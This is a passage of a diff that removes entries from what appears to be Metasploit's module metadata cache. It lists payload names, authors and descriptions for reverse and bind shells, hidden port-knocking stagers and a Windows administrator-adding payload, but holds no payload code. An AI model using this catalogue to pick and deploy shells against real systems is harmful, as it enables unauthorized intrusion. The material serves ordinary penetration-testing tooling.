Compatible with Python 2.6-2.7 and 3.4+.", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/python/shell_reverse_udp.rb", - "is_install_path": true, - "ref_name": "python/shell_reverse_udp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_r/shell_bind_tcp": { - "name": "R Command Shell, Bind TCP", - "fullname": "payload/r/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Continually listen for a connection and spawn a command shell via R", - "references": [], - "platform": "R", - "arch": "r", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/r/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "r/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_r/shell_reverse_tcp": { - "name": "R Command Shell, Reverse TCP", - "fullname": "payload/r/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Connect back and create a command shell via R", - "references": [], - "platform": "R", - "arch": "r", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/r/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "r/shell_reverse_tcp", - 
"check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_ruby/pingback_bind_tcp": { - "name": "Ruby Pingback, Bind TCP", - "fullname": "payload/ruby/pingback_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "asoto-r7" - ], - "description": "Listens for a connection from the attacker, sends a UUID, then terminates", - "references": [], - "platform": "Ruby", - "arch": "ruby", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 19:02:28 +0000", - "path": "/modules/payloads/singles/ruby/pingback_bind_tcp.rb", - "is_install_path": true, - "ref_name": "ruby/pingback_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_ruby/pingback_reverse_tcp": { - "name": "Ruby Pingback, Reverse TCP", - "fullname": "payload/ruby/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "asoto-r7" - ], - "description": "Connect back to the attacker, sends a UUID, then terminates", - "references": [], - "platform": "Ruby", - "arch": "ruby", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 19:02:28 +0000", - "path": "/modules/payloads/singles/ruby/pingback_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "ruby/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_ruby/shell_bind_tcp": { - "name": "Ruby Command Shell, Bind TCP", - "fullname": "payload/ruby/shell_bind_tcp", - "aliases": 
[], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "kris katterjohn ", - "hdm " - ], - "description": "Continually listen for a connection and spawn a command shell via Ruby", - "references": [], - "platform": "Ruby", - "arch": "ruby", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/ruby/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "ruby/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_ruby/shell_bind_tcp_ipv6": { - "name": "Ruby Command Shell, Bind TCP IPv6", - "fullname": "payload/ruby/shell_bind_tcp_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "kris katterjohn ", - "hdm " - ], - "description": "Continually listen for a connection and spawn a command shell via Ruby", - "references": [], - "platform": "Ruby", - "arch": "ruby", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb", - "is_install_path": true, - "ref_name": "ruby/shell_bind_tcp_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_ruby/shell_reverse_tcp": { - "name": "Ruby Command Shell, Reverse TCP", - "fullname": "payload/ruby/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "kris katterjohn ", - "hdm " - ], - "description": "Connect back and create a command shell via Ruby", - "references": [], - "platform": "Ruby", - "arch": "ruby", - "rport": null, - 
"autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/ruby/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "ruby/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_ruby/shell_reverse_tcp_ssl": { - "name": "Ruby Command Shell, Reverse TCP SSL", - "fullname": "payload/ruby/shell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Connect back and create a command shell via Ruby, uses SSL", - "references": [], - "platform": "Ruby", - "arch": "ruby", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb", - "is_install_path": true, - "ref_name": "ruby/shell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_solaris/sparc/shell_bind_tcp": { - "name": "Solaris Command Shell, Bind TCP Inline", - "fullname": "payload/solaris/sparc/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "Solaris", - "arch": "sparc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "solaris/sparc/shell_bind_tcp", - "check": false, - "post_auth": 
false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_solaris/sparc/shell_find_port": { - "name": "Solaris Command Shell, Find Port Inline", - "fullname": "payload/solaris/sparc/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 " - ], - "description": "Spawn a shell on an established connection", - "references": [], - "platform": "Solaris", - "arch": "sparc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/solaris/sparc/shell_find_port.rb", - "is_install_path": true, - "ref_name": "solaris/sparc/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_solaris/sparc/shell_reverse_tcp": { - "name": "Solaris Command Shell, Reverse TCP Inline", - "fullname": "payload/solaris/sparc/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "Solaris", - "arch": "sparc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "solaris/sparc/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_solaris/x86/shell_bind_tcp": { - "name": "Solaris Command Shell, Bind TCP Inline", - "fullname": 
"payload/solaris/x86/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "Solaris", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "solaris/x86/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_solaris/x86/shell_find_port": { - "name": "Solaris Command Shell, Find Port Inline", - "fullname": "payload/solaris/x86/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Spawn a shell on an established connection", - "references": [], - "platform": "Solaris", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/solaris/x86/shell_find_port.rb", - "is_install_path": true, - "ref_name": "solaris/x86/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_solaris/x86/shell_reverse_tcp": { - "name": "Solaris Command Shell, Reverse TCP Inline", - "fullname": "payload/solaris/x86/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "Solaris", 
- "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "solaris/x86/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_tty/unix/interact": { - "name": "Unix TTY, Interact with Established Connection", - "fullname": "payload/tty/unix/interact", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Interacts with a TTY on an established socket connection", - "references": [], - "platform": "Unix", - "arch": "tty", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/tty/unix/interact.rb", - "is_install_path": true, - "ref_name": "tty/unix/interact", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/adduser": { - "name": "Windows Execute net user /ADD", - "fullname": "payload/windows/adduser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm ", - "Chris John Riley", - "vlad902 ", - "sf " - ], - "description": "Create a new user and add them to local administration group.\n\n Note: The specified password is checked for common complexity\n requirements to prevent the target machine rejecting the user\n for failing to meet policy requirements.\n\n Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": 
null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/adduser.rb", - "is_install_path": true, - "ref_name": "windows/adduser", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/custom/bind_hidden_ipknock_tcp": { - "name": "Windows shellcode stage, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/windows/custom/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "Borja Merino " - ], - "description": "Custom shellcode stage.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. 
The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", - "is_install_path": true, - "ref_name": "windows/custom/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_windows/custom/bind_hidden_tcp": { - "name": "Windows shellcode stage, Hidden Bind TCP Stager", - "fullname": "payload/windows/custom/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "Borja Merino " - ], - "description": "Custom shellcode stage.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", - "is_install_path": true, - "ref_name": "windows/custom/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_windows/custom/bind_ipv6_tcp": { - 
"name": "Windows shellcode stage, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/windows/custom/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf " - ], - "description": "Custom shellcode stage.\n\nListen for an IPv6 connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/custom/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_windows/custom/bind_ipv6_tcp_uuid": { - "name": "Windows shellcode stage, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/custom/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Custom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/custom/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - 
"stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_windows/custom/bind_named_pipe": { - "name": "Windows shellcode stage, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/windows/custom/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "UserExistsError" - ], - "description": "Custom shellcode stage.\n\nListen for a pipe connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/custom/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_windows/custom/bind_nonx_tcp": { - "name": "Windows shellcode stage, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/windows/custom/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "vlad902 " - ], - "description": "Custom shellcode stage.\n\nListen for a connection (No NX)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/custom/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - 
"stager_refname": "windows/bind_nonx_tcp" - }, - "payload_windows/custom/bind_tcp": { - "name": "Windows shellcode stage, Bind TCP Stager (Windows x86)", - "fullname": "payload/windows/custom/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf " - ], - "description": "Custom shellcode stage.\n\nListen for a connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/custom/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_tcp" - }, - "payload_windows/custom/bind_tcp_rc4": { - "name": "Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/custom/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Custom shellcode stage.\n\nListen for a connection", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/custom/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - 
"stager_refname": "windows/bind_tcp_rc4" - }, - "payload_windows/custom/bind_tcp_uuid": { - "name": "Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/custom/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "OJ Reeves" - ], - "description": "Custom shellcode stage.\n\nListen for a connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/custom/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_windows/custom/find_tag": { - "name": "Windows shellcode stage, Find Tag Ordinal Stager", - "fullname": "payload/windows/custom/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "skape " - ], - "description": "Custom shellcode stage.\n\nUse an established connection", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/findtag_ord.rb", - "is_install_path": true, - "ref_name": "windows/custom/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": 
"windows/findtag_ord" - }, - "payload_windows/custom/reverse_http": { - "name": "Windows shellcode stage, Windows Reverse HTTP Stager (wininet)", - "fullname": "payload/windows/custom/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm " - ], - "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows wininet)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_http.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_http" - }, - "payload_windows/custom/reverse_http_proxy_pstore": { - "name": "Windows shellcode stage, Reverse HTTP Stager Proxy", - "fullname": "payload/windows/custom/reverse_http_proxy_pstore", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm " - ], - "description": "Custom shellcode stage.\n\nTunnel communication over HTTP", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_http_proxy_pstore", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - 
"stager_refname": "windows/reverse_http_proxy_pstore" - }, - "payload_windows/custom/reverse_https": { - "name": "Windows shellcode stage, Windows Reverse HTTPS Stager (wininet)", - "fullname": "payload/windows/custom/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm " - ], - "description": "Custom shellcode stage.\n\nTunnel communication over HTTPS (Windows wininet)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_https.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_https" - }, - "payload_windows/custom/reverse_ipv6_tcp": { - "name": "Windows shellcode stage, Reverse TCP Stager (IPv6)", - "fullname": "payload/windows/custom/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf " - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker over IPv6", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": 
"windows/custom", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_windows/custom/reverse_named_pipe": { - "name": "Windows shellcode stage, Windows x86 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/windows/custom/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "OJ Reeves" - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_named_pipe" - }, - "payload_windows/custom/reverse_nonx_tcp": { - "name": "Windows shellcode stage, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/windows/custom/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "vlad902 " - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker (No NX)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - 
"staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_windows/custom/reverse_ord_tcp": { - "name": "Windows shellcode stage, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/windows/custom/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "spoonm " - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_windows/custom/reverse_tcp": { - "name": "Windows shellcode stage, Reverse TCP Stager", - "fullname": "payload/windows/custom/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf " - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": 
